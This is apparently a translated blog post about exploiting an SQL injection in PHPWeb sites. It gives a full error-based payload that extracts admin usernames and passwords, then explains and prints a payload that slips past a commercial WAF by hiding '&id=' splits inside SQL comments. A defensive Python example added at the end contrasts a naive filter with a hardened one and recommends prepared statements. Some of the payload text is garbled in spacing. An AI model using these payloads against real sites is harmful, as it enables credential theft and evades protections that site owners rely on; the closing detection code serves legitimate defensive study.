Today kiyou xiaoliumang sent over a PHPWeb site and we looked at it together. PHPWeb has the injection vulnerability mentioned earlier. First I added a few statements to check whether injection exists and whether errors are reported. Although the single quote we submitted in the SQL statement was changed to %27, that is only the browser's doing; you can simply submit the request through a proxy.
Then I directly used the statement:
? 116 '/**/and (select/**/1/**/from (select/**/count (*), concat (select/**/concat (0x7e, 0x27, pwn_base_admin.user, 0x27, 0x7e, pwn_base_admin.password, 0x27, 0x7e)/**/from/**/pwn_base_admin/**/limit/**/0, 1 )) /**/from/**/information_schema.tables/**/limit/**/0, 1), floor (rand (0) * 2 )) x/**/from/**/information_schema.tables/**/group/**/by/**/x) a)/**/and/**/'1'{'1.html
As a result, the Zhichuang WAF showed up. www.2cto.com
I was about to give up, but in the end I forced my way through anyway. The approach was:
1. Find out which statements the WAF intercepts. First submit keywords such as select, union and from on their own, then submit combinations of these SQL keywords. It turned out that whenever select and from appear together the request is intercepted; other keyword combinations were not tested.
2. The first bypass that comes to mind is case conversion. That was useless: WAFs generally normalize case. The second is encoding. However, PHPWeb concatenates the statement directly into the SQL query, so even if an encoding could get past the WAF, it would not produce a valid SQL query.
3. I tried playing with the protocol: adding a few spaces and a few question marks after the GET request line, anything that did not turn it into a bad request. The result was that this GET packet could only be changed slightly, and no bypass was found that way.
4. Now the bypass idea. In fact, PHPWeb and the WAF interpret the request differently. PHPWeb concatenates the part before .html directly into the SQL query, regardless of whether it is encoded and regardless of whether it contains "=" or "&" (the two symbols the HTTP protocol uses to assign values to parameters and to split parameters), whereas the WAF parses everything after the question mark according to the HTTP protocol. So we can use /*&id=*/ to split the constructed SQL statement and bypass the WAF. The final constructed statement is as follows:
/Product/class /? Id/* = */abc '/**/and/**/(select/**/1/* & id = */from (/* & id = */ select/** // * & id = */count (*), /* & id = */concat (/* & id = */select/**/(/* & id = * = */select/** // * & id = */concat (0x7e, 0x27, pwn_base_admin.user, 0x27, 0x7e, pwn_base_admin.password, 0x27, 0x7e) /** // * & id = */from/**/pwn_base_admin/**/limit/**/0, 1 )) /** // * & id = */from/**/information_schema.tables/**/* & id = */limit/**/0, 1 ), /* & id = */floor (rand (0) * 2 )) x/** // * & id = */from/**/* & id = */information_schema.tables/**/* & id = */group /** // * & id = */by/*/x) a)/** // * & id = */and/** // * & id = */'1'{'1.html
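To show the parsing gap from the defender's side, here is an added Python example (not code from the original post or from PHPWeb): a naive check that splits the query string into HTTP parameters before looking for "select ... from", beside a check that URL-decodes the raw request target and strips SQL comments before any splitting, so that a comment carrying "&id=" no longer fragments the keywords. The sample request targets are constructed for this example; the real fix is for the application to stop concatenating the path segment into SQL and use prepared statements, which a WAF can only paper over.

```python
import re
from urllib.parse import unquote

# Constructed sample request targets (not taken from the original post).
SAMPLES = {
    "benign": "/Product/class/?id=116.html",
    "plain": "/Product/class/?id=116'/**/and/**/(select/**/1/**/from/**/x)",
    # A comment that contains "&id=" splits the keywords across parameters.
    "comment_split": "/Product/class/?id=116'/**/and/**/(select/**/1/*&id=*/from/**/x)",
}

SQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
SELECT_FROM = re.compile(r"\bselect\b.*\bfrom\b", re.IGNORECASE | re.DOTALL)


def naive_waf(target: str) -> bool:
    """Mimic the behaviour described in the post: parse the query string
    as HTTP parameters first, then look for 'select ... from' inside each
    value. The payload fragmented by '&id=' never matches."""
    query = target.split("?", 1)[1] if "?" in target else ""
    for pair in query.split("&"):
        value = pair.split("=", 1)[1] if "=" in pair else pair
        if SELECT_FROM.search(unquote(value)):
            return True
    return False


def hardened_waf(target: str) -> bool:
    """Inspect the request the way the backend consumes it: the whole
    decoded target, with SQL comments removed, before any splitting."""
    stripped = SQL_COMMENT.sub(" ", unquote(target))
    return SELECT_FROM.search(stripped) is not None


if __name__ == "__main__":
    for name, target in SAMPLES.items():
        print(f"{name:14s} naive={naive_waf(target)!s:5s} hardened={hardened_waf(target)}")
```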